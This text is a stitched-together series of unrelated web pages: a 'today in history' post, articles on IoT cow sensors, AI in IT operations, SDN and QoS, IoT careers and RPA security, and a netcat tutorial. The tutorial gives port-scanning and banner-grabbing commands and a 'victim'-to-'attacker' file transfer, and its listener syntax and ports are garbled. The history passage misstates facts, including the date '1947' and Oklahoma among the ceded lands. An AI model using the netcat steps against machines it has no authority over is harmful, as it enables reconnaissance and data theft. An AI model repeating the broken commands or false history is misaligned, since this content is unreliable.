“History is a cyclic poem written by Time upon the memories of Human Being.”- Shelley, English Poet. History is the study of the past; specifically the people, societies, events, and problems of the past as well as our attempts to understand the past. It is a pursuit common to all human communities. History can take the form of a tremendous story, a rolling narrative filled with ideal personalities and tales of turmoil and triumph. Each generation adds its chapters to history while reinterpreting and finding new things in those chapters already written. Let’s discover what happened on September 14 in World History: 1847: General Winfield Scott captures Mexico City On September 14, 1847, the Stars and Stripes flew over a foreign capital for the first time in American history. After winning the last major battle of the Mexican-American War, U.S. General Winfield Scott marched his army into Mexico City and raised the American flag over the Mexican National Palace on the site of the “Halls of Montezuma.” This would later be celebrated in the famous Marines’ Hymn. While the last major battle was won by September of 1947 and Mexico City was captured, the Mexican-American War did not end until February 2, 1848. On that date, the United States and Mexico agreed to the Treaty of Guadalupe Hidalgo. Under the conditions of the treaty, Mexico agreed to sell California and the rest of its territory north of the Rio Grande for $15 million. The 525, 000 square miles of ceded land would later become the states of New Mexico, Nevada, Utah, Arizona, Colorado, Wyoming, and Oklahoma. Mexico was also forced to recognize the U.S. annexation of Texas. Fought from 1846 to 1848, close to 79,000 American troops took part in the Mexican-American War. Future Union and Confederate generals Ulysses S. Grant, George Meade, Robert E. Lee, and Stonewall Jackson were among them. Nearly 13,200 Americans lost their lives in the conflict. Some in the United States considered the Mexican-American War an unjust land grab. Future U.S. President Abraham Lincoln, who was an Illinois congressman at the time, was one of the war’s harshest critics. While the justifications for fighting the war were debated then and will still be debated today, we must always remember the bravery and skill displayed by American forces in achieving victory. As always, our troops did what was asked of them. The United States wouldn’t look the way that it does today without the efforts of our military in the Mexican-American War. 1959: Soviet probe reaches the moon After midnight passed in Moscow, the Soviet Union’s Luna 2 intentionally crashed into the moon on 14th September 1959, becoming the first man-made spacecraft reaches to the moon. It was the Soviet Union’s second attempt to reach the moon. Luna 1 had missed its target by about 3,700 miles after it launched in January 1959. Luna 2 carried Soviet pennants, two of which were located in the spacecraft and were sphere-shaped, with the surface covered by identical pentagonal elements. In the center of this sphere was an explosive that slowed the huge impact velocity. Each of the stainless steel pentagonal elements had the USSR Coat of Arms and the date “1959 September” on them. Reaching the moon first was a highly coveted claim during the Space Race. Unfortunately for the U.S., Luna 2 hit its target just as Soviet premier Nikita Khruschev was due to arrive in the U.S. to be welcomed by President Eisenhower.
<urn:uuid:f8e3ec2a-2035-4c39-8e56-6561ad78bdb1>
CC-MAIN-2022-40
https://areflect.com/2020/09/14/today-in-history-september-14/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00676.warc.gz
en
0.970684
781
3.875
4
Austrian start-up SmaXtec has invented a tool for farmers to remotely monitor the health and wellbeing of their livestock or IoT cows. Taking advantage of the Internet of Things (IoT), the company is placing connected sensors insides cows’ stomachs to transmit health data over Wi-Fi. The monitor will track the cow’s health and send a text message to the farmer when she pregnant. It’s already being used in two dozen countries across the world, according to Bloomberg. Typically, it’s hard to tell if a cow is unwell or when it might give birth. If a farmer suspects either of those things, they will usually have to herd the cow into a cattle crush for a vet to check it over. SmaXtec supposedly gets around some of these problems by placing weighted sensors – about the size of a hotdog – in through the cow’s throat and into its four stomachs. The device then transmits up-to-the-minute data about the temperature of the cow, the pH of her stomach, movement, and activity. A base station in the barn will pick up the signals and uploads all of the data to the cloud. If the cow falls ill, the system e-mails the vet, supposedly before the cow is obviously sick. And when a cow is pregnant a text message will be sent to the farmer and his team, so that they can act accordingly. SmaXtec claims the device should have around four years of battery life, and can predict with 95 percent accuracy when a cow is pregnant. A global farming opportunity So, is this device really better than a farmer’s instinct and expertise? “It’s easier, after all, to look at the situation from inside the cow than in the lab,” SmaXtec’s co-founder Stefan Rosenkranz told Bloomberg. And while the technology might not be able to assess exactly what is making the cow sick, Helen Hollingsworth, a veterinary nurse at Molecare Veterinary Services (SmaXtec’s distributor in the UK), pointed out that things like temperature alarms “make you go and check earlier then you otherwise would. If you can detect illness early, you can start antibiotics earlier and ultimately use less.” Roughly 350 farms across two dozen countries are using this technology, SmaXtec said. The devices have been implanted into 15,000 cows in Britain alone in the last six years. The setup costs of $600 to set up the network and between $75 and $400 per cow are incurred by the company or distributors, Bloomberg reported. Farmers, therefore, simply pay a $10 a month charge per cow to use this service. SmaXtec is targeting industrial operations in China, the Middle East and the U.S., but it also has an eye on the 90 million cattle on dairy farms all over the world. It will have stiff competition from the likes of Telefonica and Cattle-Watch, but it seems the age of IoT cows is well on its way. This is not the first IoT case study to involve cows however, with Fujitsu’s head of insurance Nick Dumonde telling IoB at the Internet of Insurance in June how farmers are increasingly using such technologies to monitor the health of pregnant cows.
<urn:uuid:615e8dda-dd6c-4a75-b30b-0835aae9eb61>
CC-MAIN-2022-40
https://internetofbusiness.com/iot-cows-farmers-health/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00676.warc.gz
en
0.949857
700
2.71875
3
Preparing for AI and Automation It is undeniable that Artificial Intelligence and Automation are in the minds of the public. With major corporations such as Google, Amazon, Facebook, and Microsoft making the news on their artificial-intelligence research and products, and personalities such as Elon Musk, Bill Gates, and Stephen Hawking holding interviews warning of an A.I. apocalypse, it's no wonder people are talking about it. Artificial Intelligence has recently migrated into Information Technology, with several companies providing solutions for IT Operations. Executives and managers are quickly eyeing it up, excited by its abilities to make employees more efficient, reduce downtime, and minimize staffing. The marketing for these products is very positive, extolling the simplicity of operations and their effectiveness. The algorithms, as it is explained, will handle everything. There is a configuration cost to get it up and running and to keep it running smoothly that management may not see at first. There is no "Easy" button here. Depending on the organization, implementing an A.I. and automation platform may require thousands of hours of work. This article aims to provide some thoughts on prerequisites to using A.I. in your IT infrastructure. The first requirement is management access. These A.I. algorithms work with large amounts of data. They want to see everything, so it can be potentially correlated. Thus, we need access to everything from where the A.I. system will be installed. All devices need to be accessible via some form of management network including servers, switches, routers, firewalls, power strips, UPS's, KVM’s, and more. Effectively, anything that has the option of connecting an Ethernet cable and configuring an IP address, needs to have that done. Unless you have an existing inventory of every device that uses a power cable, this step will probably also require a full inventory of all equipment at every location. Many of these devices may be managed by other departments as well, requiring internal resources and collaboration. This is also an important step for many other reasons, and is highly recommended before continuing. Be sure to name these devices in a consistent manner. Most of the algorithms in use require similar wording used between devices in a logical or physical area in order to increase matching probability. This will require the formulation of a corporation-wide naming standard, and potentially renaming hundreds or thousands of devices. Regarding the network itself, depending on your environment, you may not have a management network, or you may have an unfinished one. So you'll need to design and create one for each of your locations, and get that routed properly. Or, maybe you have a very large environment with many management networks for various purposes and departments. Those will need to be identified, routes may need to be created, VPN SA’s may need reconfiguration, and ACL’s opened to the location of the A.I. system. Now that there is a management network that can communicate between all devices and your A.I. system, you need to provide management services to it. The first thing that comes to mind is SNMP. A modern network should have SNMPv3 configured if a device supports it, which requires some security design effort as well. MIB’s may have to be found, or OID’s walked. Devices will need to be configured to report all SNMP traps possible, and to allow polling from the A.I. collector. Next up would be Syslog. Preferably with encryption if supported for each device. This step would be best designed with a series of Syslog collection servers, local to each location, then forwarding those localized collections to the A.I. collector. This would require design and implementation time for such a distributed Syslog system. Part of that system would most likely include an ELK stack implementation on top of it for additional analysis, which can be very involved. There may be other monitoring systems already in-place, performing up/down detection, resource utilization alerting, and synthetic transactions. Similarly, systems such as vCenter and AWS Cloudwatch may be used. Each of these systems would need to be configured to copy all alerts to the A.I. collector. These configurations may also need to be customized for the collector, as the A.I. will want to know about events sooner and more frequently than an email alert to IT personnel. It’s very likely these reporting systems may send alerts to a ticketing system or collaboration service, which should also be integrated into the A.I. platform as an output. Once the algorithms detect a highly-probable issue, a ticket can be created for front line personnel. This may also require configuration and scaling considerations for your email server, depending on how it is integrated. So far, we’ve talked about the setup of the networked devices, to allow for detection of issues. Once these alerts are investigated, they need an action performed. If an organization wishes to enable automation, that is, the automatic resolution of alerts from these A.I. systems, there needs to be remote management access provided to all devices. Not in the form of data flow from the networked devices, but the remote access of them. Remote access methods such as SSH, and Powershell are most common today. If a device is too old or not licensed to run SSH or Powershell for example, that device will need to be replaced or upgraded. The configuration of this remote access requirement may also be lengthy. The automation methods provided usually rely on scripts of some kind. Scripts you may want to run via an automation system such as Ansible, rather than individual shell scripts. Again, we find a system that needs planning and implementation. This also requires personnel to write resolution scripts and playbooks for each issue that is detected, which would require personnel who know how to code, and certainly take a lot of time initially. Finally, these A.I. alerts and resolutions only happen when the algorithm has a high level of confidence that an issue is correct. That means personnel need to train the system, especially in the beginning. There are usually many algorithms that work together, each one using a different set of rules, which requires care and validation. Algorithms are diverse and may include the ability to detect relationships between alerts based on source type, physical or logical proximity, time, language usage, and topology analysis. As you can see, there is no "Easy" button here. A.I. platforms, their automation systems, and their algorithms are extremely powerful today, but they require planning, lots of preparatory work, and training once running. They cannot be implemented quickly, as a quick fix for lack of enough personnel, and in fact, will require more personnel during the implementation and configuration phase. When properly planned for and implemented, an A.I. system can be an important enhancement to IT Operations.
<urn:uuid:704392d9-e76b-45dc-afa6-c004d098fea2>
CC-MAIN-2022-40
https://ine.com/blog/preparing-for-ai-and-automation
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00676.warc.gz
en
0.957725
1,419
2.71875
3
Many hacker and information security experts are using netcat. Netcat is a old but powerful information security tool is used to read and write from one computer to another computer through the network connection using TCP or UDP protocol. I have been working in cyber security field more than 7 years, and found netcat working very well still. due to the use and multiple functionalities, got name swiss army knife for ethical hacking. Most big certification course like CEH (Certified Ethical Hacker) and Penetration Testing with Kali Linux are teaching about netcat. By default netcat is available in Kali Linux but if you want to use netcat in windows, download netcat windows. netcat download Here are most common uses of netcat: - Port scanning. - Banner Grabbing - Transferring Files. Port Scanning by Netcat Linux Port scanning is a methodology to find out open ports on target machine. Nmap is most known and powerful tool used for port scanning but necat also can be used to scan target machine to check open port. Here is an example of port scanning. syntax: #nc -v [Target Machine IP address] [Port Number] #nc -v 192.168.0.1 80 The -v switch is used to get verbose output. 192.168.0.1 is the IP address of Target Machine and port number is 80. Result: port is open. If you want to scan port within range, provide range instead of single port. For the example if you want to scan port range 10 to 100 then you will use following syntax: #nc -v 192.168.0.1 10-100 Banner Grabbing by Netcat Banner grabbing is a fingerprinting technique, used to extract useful information from the target machine like what service running on open port. When we send banner grabbing request through the netcat, we will send some output, after analyzing same find out helpful information like Operating system detail, service detail on particular port etc.One important thing is established connection is required by netcat to the victim machine before start banner grabbing. Here is an example of banner grabbing, victim is google.com server and Syntax: #nc [domain name / IP Address] [Port Number] #nc www.google.com 80 Transferring Files by using Netcat Most common method for transferring files over network is using FTP, netcat is another tool is used to transfer files over networking using TCP or UDP protocol. Two modes are required, one is listen mode on sending end another is receiver’s end. you must establish connection between target and attacker with specific IP address, then execute file transfer command. On Target Computer (Victim / Reciver Computer): nc -v -w 30 31337 -l nc -v -w 30 31337 -l file.txt -v verbose mode; gives feedback on the screen during an operation -w 30 tells Netcat to wait for 30 seconds before terminating the file transfer process 31337 the port number -l the computer is the listener <text.txt —taking the file and sending it On Attacker Machine: #nc -v -w 3 [victime IP Address] [port number] > [File name] #nc -v -w 3 192.168.0.1 4444 > file.txt -w 3 —wait two seconds before canceling the transfer, in case of loss of connection 192.168.0.1 —IP address of the Victim machine 4444 —listening port of the Victim machine >text.txt —receiving the output of the Windows machine and putting it in a new text file If you have any question related this post please comment below.
<urn:uuid:5bc507fc-6a39-4786-b2b4-7475d0992c06>
CC-MAIN-2022-40
https://www.cyberpratibha.com/blog/netcat-linux-tutorial-with-examples/?amp=1
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00676.warc.gz
en
0.858681
803
3.09375
3
For the entirety of its existence, the network has functioned just like a utility company: a service available for all manner of useful functions. It has almost no visibility for developers and the applications they write to use the network. Now, the call is going out to make the network responsive to application needs. We have to create harmony between two things that, until now, have been almost entirely ignorant of each other. But if the network becomes more responsive to applications, applications also have to give something back to the network. QoS was one attempt to make the network more flexible based on different application requirements, such as voice. Not that the network engineers got it right the first time; it took priority queuing, weighted fair queuing, class-based weighted fair queuing and finally low-latency queuing to capture the characteristics of voice traffic. It might have been much simpler in the beginning if the voice stream could have told the network, "I need to have some guaranteed bandwidth to make sure my packets get to their destination in the right order. But I don't need all the bandwidth on the link." Now, the promise of SDN says that the network can respond to application demands. Apps can ask for things and the network can be reconfigured to provide resources as needed. That's a powerful tool for developers. It's like teaching children to ask for things instead of them shyly hoping that they'll be given something. There's a lot of talk about the transformation of the data center via software, but what's real and what's hype? Get some perspective in "Software Defined Data Center: Marketing or Meaty?."] The ability to affect your operating environment is huge for developers who want to ensure availability and performance. But that ability comes with some responsibility. For example, applications need visibility into network conditions to be able to request resources. Those same applications also need to be able to listen to network conditions and respond accordingly when those resources aren't available. Think of it like a GPS in your car that has a real-time feed for local traffic conditions. If a particular link is blocked, the network should be able to make that condition known to the application and suggest alternate links. One might be high speed but carry a higher cost. This would be critical for real-time traffic processing. The other option may be slower but less expensive. For bulk data this would be ideal. Traffic can be processed appropriately as needed based on network conditions. You're probably saying, "That's silly. Why not just make the decision for the application? Why provide feedback at all?" That's a good point. Think about the first generation GPS units that did automatic traffic rerouting based on conditions. You might get offered a strange surface street route to your destination instead of getting a toll road that would cost you something but get you there much faster. Would you ask your GPS why it chose that particular route? What if you have a pocket full of quarters and couldn't be late that day? Normally, you'd love the surface street option. However, conditions change and default choices need to be reexamined. Making the choice is easy. We've built enough intelligence into the network to rapidly decide which route is best based on a number of conditions. What's important in the new network is offering the application a choice based on data that the network can provide. If we can reconfigure on the fly and tag packets to choose certain links, whether it be through a tunnel to an exit point or a hop-by-hop tag protocol, then we should offer that choice to the application developers. Why spend our time making the network do all the heavy lifting? Let the application make the decision before the first packet is sent. The network should just respond to the chosen information provided at a higher level and send the packet to the selected destination. Again, QoS is a good example. It can only make packet decisions based on a small amount of information, like source IP or destination port. Some vendors have implemented advanced matching, such as Cisco's NBAR, but those are not universal by any means and don't track from device to device. To be really useful, QoS needs a big-picture view. It will take some work to ensure that the applications don't take advantage of their influence. A set of policies can be enacted to discard application criteria when they are outside of a baseline or a threshold. For instance, maybe the satellite link is only for priority traffic in the event of an outage. Even if an application requests that link, a lower-order rule can prevent that traffic from transiting a given link. Triggers can also be built in along the way to send notifications to stakeholders when developers get greedy and send their traffic along expensive or priority links. This can prevent sticker shock later on when a developer unknowingly prioritizes an expensive link for non-critical traffic. Those are the kinds of safeguards that the bean counters love. The network and the application can no longer exist in separate black boxes. At the same time, these two need to learn to get along with each other and work together to make life easier on everyone. We've spent most of our lives trying to make the network listen. Now it's time to make the applications do the same. What do you think? Should applications be responsive to the network? Or should the network stay quiet and make all the decisions absent of application input? Are you gearing up to bring QoS to your network, or do you want a deeper understanding of how best to configure it? Check out Ethan Banks' workshop, "How To Set Up Network QoS for Voice, Video & Data" at Interop New York this October.
<urn:uuid:0d4aadd3-f233-4309-a1ea-b6fe54069df8>
CC-MAIN-2022-40
https://www.networkcomputing.com/networking/should-applications-listen-network
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00676.warc.gz
en
0.953465
1,169
2.640625
3
Today, a global network of connected things is used in the way no one could have even imagined ten years from now. It is impossible to impress someone today talking about smart kettles or fitness collars for their dogs. Dozens of objects we are using in our everyday life are now connected to the web, all in the attempt to make lives easier and grant us greater control over things. This large universe of smart and connected objects has a name – the Internet of Things. According to the most recent estimations, the number of IoT connected devices should exceed 75 billions worldwide in 2025. These connected machines and objects are now contributing to what is called the Fourth Industrial Revolution. Here is what one should know about the connected world that we live in. What Exactly Is the Internet of Things? The Internet of things (IoT) is a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.1 Cellular connectivity combined with the Internet has largely speeded up our developmental processes. It took only 40 years for humanity to progress from 1G to 5G. By 2030, the world is expected to use 6G Internet connectivity. Most of the newest technological developments rely on the Internet. And the Internet of Things participates to this innovation flow. Specialists from EssayPro confirm that the subjects related to IoT are getting very popular among students of different majors. Of course, most of the research papers are being prepared by IT and Engineering learners. Careers in IoT promise an interesting work environment, professional development, and high wages. It really seems to be a perfect domain for students interested in contributing to technological advancement. Why Do We Need IoT? Since it all comes down to data as the core element, we are now into a position where we depend on technologies that connect us. Each device can collect data for a purpose, but this data is only valuable if it is communicated, analyzed, and used on time. Improved performance is another factor in favor of IoT. The level of interconnectedness achieved through IoT technologies helps people use things more efficiently. It allows saving such scarce and non-rechargeable resources like time and effort. Moreover, the Internet of Things allows companies, governments, and other organizations to re-think how they deliver services and produce goods. The data collected assists them in providing more accurate and responsive interactions that bring advanced innovations and change. What Is the Future of IoT? The Internet of Things is only at the dawn of its development. Even those people who have already tried smart home technologies, motion sensors, and other IoT perks can see that there are lots of issues that need to be addressed. It is wrong to assume that data is all IoT is about. It is also about the security of the vast amounts of data generated through the IoT. Today, the world’s biggest technological corporations see the danger in uncontrolled data collection. Therefore, the main goal of all IoT developers is to make sure that the devices they produce are secure to use. For this purpose, AI, Machine Learning, and other advanced technologies should be widely applied. In fact, lack of data security is the greatest threat the Internet of Things is facing right now. Some manufacturers were forced to recall their products when the unsecured connection had been revealed. How anIoT Product Is Developed? During the development process, IoT devices and objects usually pass several stages. They determine the need for skills IoT developers should have. However, some tasks are delegated to experts of differing fields. These may include engineers, website developers, programmers, UI/UX designers, etc. IoT developers should be able to communicate with all of them to help translate connectivity and other data-related goals. The entire process usually passes the following stages: - Product development. IoT developers take part in this phase to ensure that wireless technologies and sensors are properly integrated in the product; - Engineering. It is not critical for a developer to have engineering skills, but this will definitely be a plus. In many cases, the device itself is assembled by other people; - Server Programming. IoT developers should be experts in using server-side languages such as PHP, ASP.NET, or Node.js. It is needed to make sure that devices and objects are connected, and the data is securely received and stored; - Evaluation and testing. IoT developers should carefully test prototypes to make sure all developmental goals are achieved; - Web development. It is important for IoT developers to be able to create a website or an app, supporting all the interactions with the IoT devices out in the field. How to Pursue a Developer Career in IoT? The requirements for IoT developers are similar to those that IT professionals face. An IoT developer should have innovative thinking and creative abilities to improve existing devices or create brand new ones. Of course, novelties should bring extra benefits for users. To build a successful career in IoT, a developer must strive for new knowledge. They should keep abreast of all changes and trends and reflect those in their work. There must be a place for testing and experiment at all times. Overall, the skill set should be as follows. Data and Artificial Intelligence/Machine Learning Since IoT devices and objects collect large amounts of data, people creating them should understand the techniques involved in data aggregating, management and analysis.. Otherwise, these devices will not have any practical value. To get started in the IoT tech field successfully, ScienceSoft’s IoT developers recommend newcomers to foster skills in design, implementation, and maintenance of data management solutions, master stream and batch processing (key technologies include Azure Stream Analytics, Spark Streaming, and Apache Hadoop), and learn how to use machine learning to extract and visualize valuable analytics insights. Deep Understanding of Sensors Even though the device can be assembled by third parties, IoT developers are fully responsible for the functioning of sensors. Therefore, their main competence lies in the use of sensors. They need to make sure that software and hardware are integrated enough to provide the expected result. Networking and Wireless Communication IoT relies on communication between devices, objects, and servers. IoT developers should have solid knowledge in networking and wireless communication to ensure connectivity is robust, secure and well adapted in terms of data rates. Any disruption in this connection can cause significant damage to the data collected. IoT developers should also be aware of IoT security to be able to protect the devices and the users. Since data is one of the most vulnerable assets, the community of specialists involved in the Internet of Things should focus on ensuring its security. Web and Mobile Development IoT developers should have some knowledge of web development. It is needed to ensure that a new product is connected with an application. Most end-users choose smartphones, so the ability to create iOS or Android application will definitely make you stand out from the crowd. If the solution involved human interactions, all the user interfaces should be easy and pleasant to use. IoT developers, possibly helped by UI/UX designers should be able to design high-quality user interfaces to make sure the solution is well accepted and used as planned. And even if you work with a professional UI/UX designer, it is useful to understand the inner side of the processes they are responsible for. Overall, it is critical to speak the same language as other professionals. IoT Development Frameworks, Languages and Technologies IoT is rich in frameworks, methodologies, and technologies. Of course, to build a successful career as an IoT developer, you should be an expert in the existing and strive to learn the emerging ones. Nowadays, it is really an exciting time to join the field of the Internet of Things. It is now a relatively young field, but as long as it grows, it will need more skilled and knowledgeable professionals. For many talented people, it will be an amazing journey with lots of achievements and accomplishments in the coming years. If you are wondering about pursuing a career in IoT, it is better to start advancing your knowledge of programming, networking, web development, and security systems right now. Otherwise, you will not be able to speak the same language with those involved in the process of creating the future.
<urn:uuid:538ea9d8-8e8b-4c43-98f5-773fba09096f>
CC-MAIN-2022-40
https://iotbusinessnews.com/2020/02/18/04909-the-profession-of-the-future-an-in-depth-guide-on-how-to-become-an-iot-developer-in-2020/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00076.warc.gz
en
0.942831
1,772
3.078125
3
It’s been a long day at work. Your to-do list has grown from 5 things to what feels like 500 things. You’re finally home and can’t think of anything better than getting into bed. You’re finally in bed except you’ve forgotten one thing. The bedroom light is still on, and you can only be what feels like 100 miles from the light switch. But it doesn’t have to be that way. Thanks to the Internet of Things, there’s an app for that. You turn the light off from your phone and resting can resume. So, what exactly is the “Internet of Things” (IoT), I hear you ask? To put it simply IoT are devices connected to the internet. Your everyday devices can now talk to each other through your network while being remotely monitored and controlled. Most people can identify IoT applications through these devices: - Amazon Alexa - Google Home - NEST heating - Smart TV’s - Smart lightbulbs - Driverless cars - Automated industrial machines History Of IoT Technology has come far, and one could assume that IoT has only just become commonly recognised. Well, that isn’t exactly true. The first device was discussed as early as 1982. One year before The Original Nintendo was released in 1983. IoT was already in the making. Can you believe it? Something as simple as a modified Coke vending machine paved the way for products such as Amazon’s Alexa. Found in Carnegie Mellon University this vending machine would report back its inventory and whether the new drinks placed in the vending machine were cold or not before consumers purchased them. Nothing’s worse than cracking open a warm Coke on a hot day. Thank God for IoT! Thanks to Bill Joy device-to-device communication started to gain traction due to his “Six Webs” framework. Although, CISCO have estimated that IoT was “born” between 2008 and 2009. This was because the people/things ratio increased from 0.08 to 1.84 in 2010. Why Do These Devices Need To Collect Data? Can you hear the voice in the back of your head? But Alexa’s Amazon spies on people – it hears everything you say. Why would we want to be spied on? Truthfully, devices found within IoT transfer data for specific reasons. This has been argued that it could help the user and the wider economy. Think about it for a minute. You’re on your way home from your stressful day at work. You’re unsure whether you have any milk. You check the camera in your fridge. (Yes, I just said camera in your fridge) You can’t see any milk, so you stop at the shop on your way home and buy some more. Now you’re tucked up in bed with a nice cup of tea. Quite simply, if these devices couldn’t collect data, then it would be unlikely for there to be any benefit to consumers. However, it’s not all about consumers you know. IOT devices enable businesses to be more efficient in the way that they work. For instance, manufacturers. Manufacturers are now beginning to add sensors to their products resulting in data being transmitted back about how they’re performing. This way they’re able to identify failing components and swap them out before it causes damage. And let’s not forget about the environment. There’s a reason energy companies are shouting about smart metres. The data they receive from your smart metre means that we can use less energy (and save money) and they become more efficient. We’re all winning. What Devices Can Be Connected To IoT? But what devices does this apply to? Any physical object can be made into an IoT device if it can be connected to the internet and controlled that way. What about a PC? A PC isn’t considered an IoT device as well as our trusty smartphones (even though they’re crammed with sensors) I can confirm this is an IoT device. Now let’s get onto the interesting bit. Most IoT devices are recognised through smart home devices. These are devices such as: - Lighting fixtures - Home security systems These devices are all in the same ecosystem. Making your life that little bit easier. Say goodbye to large energy bills by automatically ensuring all lights and electronics are switched off. But wait there is more. Smart homes can also be used to aid the elderly and those with disabilities. These home systems can use assistive technologies to accommodate an owner’s specific difficulties. Voice control can help those with limited sight. Alert system can be fitted directly to a cochlear implant. Sensors can be worn to monitor for medical emergencies such as falls or seizures. This is great, right? Well, let’s get back to business. In fact, let’s talk about “Enterprise IoT”. Industrial And Enterprise IoT (Also known as, Industrial IoT.) This refers to devices used in business and corporate settings. By 2019 IoT will have up to 9.1 billion devices. Some of the benefits include: - Monitor their overall business processes - Improve the customer experience - Save time and money - Enhance employee productivity - Integrate and adapt business models - Make better business decisions - Generate more revenue Let’s just consider one thing. It’s great that these devices can help us. But what if someone uses it for negative reasons? What then? Privacy Gets A Bit More Confusing According to Samsung, 7.3 billion devices need to be made secure by 2020. Yikes, someone needs to get a move on. More personal concerns surround consumer choice and ownership of data and how exactly this is going to be used. There has been some talk about targeted ads becoming, well, a bit more targeted. Let’s take you back to the fridge with the camera. Your fridge is empty. You know that, but you’re trying not to think about it. But now local takeaway companies know. Now you’re bombarded with takeaway ads and no food in the fridge. Although this is great for the fast food industry. Where does it leave consumers? Keeping this balance is vital to consumers trust and loyalty. IoT And Cyberwarfare It’s important to note here that anything connected to the internet can be hacked. Let me lift the veil for you. Hackers are now actively targeting IoT devices such as routers and webcams because of the lack of security. However, there’s more. Industrial machinery connected to IoT can also be hacked. What exactly does that mean? For instance, hackers could hack into a driverless car and take control. This is not ideal. Hackers can also take control of sensors in power plants and cause the controllers to make the wrong decisions. The results of this would be catastrophic. Which means countries are now beginning to plan their cyberwarfare strategies. But fear not. IoT is relatively safe. You’re not likely to suffer any major loss or damage through someone hacking your smart metre. Or hacking your PC. However, enterprise companies should always remain cautious. Being vulnerable, they should take steps to keep their networks secure, always. IoT And Cloud Computing IoT generates vast amounts of data. Most companies will choose to complete their data processing in the cloud. This saves them building large amounts of in-house capacity. Microsoft, Amazon and Google already offer their services on this. IoT And Smart Cities Let me guess, You thought IoT services were predominately for businesses and smart homeowners? Well, you’re about to be really surprised. Introducing IoT combined with the real world. Songdo, South Korea, is the first of its kind – a fully equipped and wired smart city. 70% of the business district is complete. Most of the city is being wired and resulting in automation with little to no human intervention. You thought that was it? Smart buildings can also reduce energy costs. This is done by using sensors to detect how many occupants are in the building. The temperature can then be adjusted automatically. Afterall, there is nothing worse than sitting in a meeting room with 15 other people and no air conditioning. And what about traffic in cities? Well, IoT is about to be the answer to your problems. IoT sensors such as streetlights and smart metres can help reduce traffic, conserve energy, monitor and address environmental concerns. While improving sanitation. Let’s talk about the environment a little bit more. Smart cities can help reduce waste and improve efficiency. IoT collects data, in real time, from these cities and can highlight areas for improvement. But what could IoT really do for the future? From a consumer perspective, it can make your life much more automated and stress-free. Say you have a meeting for the week. If your car was connected to your phone it could plan the best route in advance. Stuck in traffic? No worries. Your car could send a text to the other party notifying them that you could be late. Not only would this improve safety. It would make your life increasingly stress free. It’s important to understand that IoT allows for endless opportunities and connections to take place. Many of these we can not even begin to comprehend. Although there are some concerns. I think it’s safe to say IoT is leading us to an interesting and hopefully stress-free life.
<urn:uuid:34a766f5-1094-4913-b481-dd00befd3efe>
CC-MAIN-2022-40
https://www.comms-express.com/blog/internet-of-things/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00076.warc.gz
en
0.9455
2,116
2.65625
3
Automating manual processes with software robots can improve company productivity, reduce errors, boost revenues, and deliver a wide range of additional benefits. One of the most compelling and important applications of robotic process automation (RPA), however, is within the realm of cybersecurity. It’s no secret that cyber threats have grown dramatically in volume, diversity, and consequence in recent years. Ransomware attacks in particular have been prolific of late, but they are just one form of cyber assault, joining everything from distributed denial of service attacks to cyber espionage to intellectual property theft. As organizations – and even national economies –become digitally based and dependent, criminals, hackers, spies, and a host of other bad actors have no shortage of attractive targets. Despite the wide variety of cyber attack types and objectives, successfully defending against all of them involves a common attribute: speed. The faster an incoming attack can be identified, the faster it can be successfully blocked. When cyber breaches do occur, mitigating their impact as quickly as possible can minimize their damage, while rapidly performing forensics and building new defenses can thwart future attacks. The volume and scope of cyber attacks long ago surpassed the ability of human security analysts on their own to monitor network traffic to spot and counter known attack signature patterns. That’s why one of the main trends within cybersecurity systems and tools has been to automate threat identification and response processes, increasingly with the support of artificial intelligence capabilities. Despite the increasing automation of security controls, however, the processes automated are typically high-level workflows that are common to all cyber defense scenarios and organizations. Beneath these universal processes are dozens, if not hundreds, of more discrete and individualized processes performed by the people who still play critical roles in the end-to-end cyber defense workflow. For example, security analysts and other professionals must often make final determinations about the seriousness of potential risks, must determine the appropriate level of response, and must interact with the digital security infrastructure in a variety of other ways. Most organizations, for example, would prefer to have humans make the decision to shut down a mission-critical, but potentially compromised, server, rather than having an AI-based security control automatically take it offline. Given that people will continue to have roles to play in many cyber defense scenarios, it makes sense to make their involvement as efficient and effective as possible. That’s where RPA can bring significant benefits by automating many of the manual processes these professionals still use, while allowing them to weigh in with their own knowledge and insight at critical junctures. Of course, while RPA can add an important layer of automation to the overall cybersecurity workflow, it’s important to ensure that the RPA platform itself is secure. In addition, the platform should integrate well with user authentication and authorization systems and other existing security controls to ensures the security of any manual processes it automates. UiPath places a high priority on the security credentials and capabilities of its own RPA platform, which growing numbers of UiPath customers are using to bolster their cybersecurity defenses and responses. For details on how UiPath addresses security in its own operations and products, see this overview.
<urn:uuid:c4e04e1c-4d66-49a8-88bf-1fb71e9f421e>
CC-MAIN-2022-40
https://www.cio.com/article/189027/boosting-security-with-robotic-process-automation.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00076.warc.gz
en
0.942974
647
2.671875
3
